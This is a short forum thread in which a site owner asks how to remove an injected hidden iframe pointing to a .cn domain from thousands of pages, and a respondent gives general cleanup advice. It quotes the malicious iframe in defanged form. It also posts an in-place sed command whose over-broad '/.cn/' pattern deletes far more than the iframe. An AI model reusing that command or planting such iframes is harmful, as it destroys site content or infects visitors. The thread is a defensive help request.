deleting iframes from files

[britney27]

hello

my website was recently infected with this stupid malware

lotultimatebet .cn

there is a hidden iframe on almost all the 6000 pages of my site.

can you please advise, if it is possible for me to remove this line from all pages by executing some command?

i can find the files using

find /var/www/vhosts/ -maxdepth 999 -type f -name “*.html” -exec sed -i ‘/.cn/ d’ {} \;
find /var/www/vhosts/ -maxdepth 999 -type f -name “*.php” -exec sed -i ‘/.cn/ d’ {} \;

but i am not sure what to use to actually remove the lines that contain the ifram for the .cn within my pages.

this is what the iframe looks like:
<iframe src="htp:// lotultimatebet. cn/ in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe>

they are all .cn domain but with different domain names.


please help. i will really appreciate it. my website has been down for two days now because of this and i really need some help.

thank you

[Rubberman]

I think you can tell sed to output everything but the lines found. If you do that, you can pipe the output to a copy of the file. If you rename the old directory tree and create a new directory set at the old location, you can remove the malware, storing the now clean files back in their original places.

Before you go back online, however, you will want to eliminate the vulnerability that caused the malware to have premissions to infect your web pages in the first place.